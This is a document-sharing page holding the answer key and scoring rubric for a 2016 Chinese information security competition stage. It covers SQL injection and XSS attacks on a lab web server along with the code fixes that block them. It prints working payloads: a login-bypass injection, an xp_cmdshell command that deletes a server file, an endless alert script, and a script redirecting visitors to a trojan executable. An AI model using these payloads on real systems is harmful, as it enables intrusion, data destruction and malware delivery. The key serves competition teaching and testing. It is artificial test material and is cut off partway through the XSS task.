2016信息安全管理与评估赛项赛题与评分标准—第二阶段答案及评分标准.docxVIP

2016信息安全管理与评估赛项赛题与评分标准—第二阶段答案及评分标准.docx

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
任务1:SQL注入攻防(55分) Web访问DCST中的WebServ2003服务器,进入login.php页面,分析该页面源程序,找到提交的变量名,并截图;(5分) 找到源程序:(2分) 页面标题:titleLogin Page/title 找到提交的变量名(3分) 提供以下变量: name=usernm name=passwd 对该任务题目1页面注入点进行SQL注入渗透测试,使该Web站点可通过任意用户名登录,并将测试过程截图;(5分) 构造注入语句: username:任意用户名 password:含:or X=’X (X为任意值) (3分) 同时包含截图: 1、通过任意用户名登录(截图) 2、登录成功页面(截图) (2分) 进入DCST中的WebServ2003服务器的C:\AppServ\www目录,找到loginAuth.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御SQL注入,并将修改后的PHP源程序截图;(10分) (10分) 包含语句: 1、 select password from users where username=’$username’ 2、 if($obj-password==$password) 再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行SQL注入渗透测试无效,并将验证过程截图;(5分) 同时包含截图: 1、通过任意用户名登录(截图) 2、登陆后,页面出现用户名不存在提示;(截图) (5分) Web继续访问DCST中的WebServ2003服务器,/-Employee Information Query,分析该页面源程序,找到提交的变量名,并截图;(5分) 找到源程序:(2分) 找到的源程序含有页面标题: titleQuery/title 找到提交的变量名(3分) name=usernm 对该任务题目5页面注入点进行渗透测试,根据输入“%”以及“_”的返回结果确定是注入点,并将测试过程截图;(5分) (2分) 输入“%”,返回所有用户信息(截图) 输入“_”,返回所有用户信息(截图) (3分) 通过对该任务题目5页面注入点进行SQL注入渗透测试,删除DCST中的WebServ2003服务器的C:\目录下的1.txt文档,并将注入代码及测试过程截图;(5分) 构造注入语句: ‘exec master.dbo.xp_cmdshell ‘del c:\1.txt’-- (5分) 进入DCST中的WebServ2003服务器的C:\AppServ\www目录,找到QueryCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御SQL注入渗透测试,并将修改后的PHP源程序截图;(10分) 截图: 在服务器场景QueryCtrl.php源程序语句:$keyWord=$_REQUEST[‘usernm’]之后加入: (10分) 再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该WebServer进行SQL注入渗透测试无效,并将验证过程截图。(5分) 通过:‘exec master.dbo.xp_cmdshell ‘del c:\1.txt’— 再次进行SQL注入截图; 系统出现错误提示:Bad KeyWord!(截图) (5分) 任务2:XSS和CSRF攻防(65分) Web访问DCST中的WebServ2003服务器,/- Employee Message Board,分析该页面源程序,找到提交的变量名,并截图;(5分) 找到源程序:(2分) 含有页面标题:titleMessage Board/title 找到提交的变量名:(3分) name=MessageUsername name=message 对该任务题目1页面注入点进行XSS渗透测试,并进入/- Employee Message Board-Display Message页面,根据该页面的显示,确定是注入点,并将测试过程截图;(5分) 构造注入代码:(2分) scriptwhile(1){alert(Hacker!);};/script 测试注入成功:(3分) 弹出alert(Hacker!)括号中的消息; 对该任务题目1页面注入点进行渗透测试,使/- Employee Message Board-Display Message页面的访问者执行网站(/)中的木马程序:/TrojanHorse.exe,并将注入代码及测试过程截图;(5分) 构造注入代码:(2分) script location.href=/TrojanHorse.exe; /script 测试过程:(3分) 名称:trojanhorse.exe

文档评论(0)

***** + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档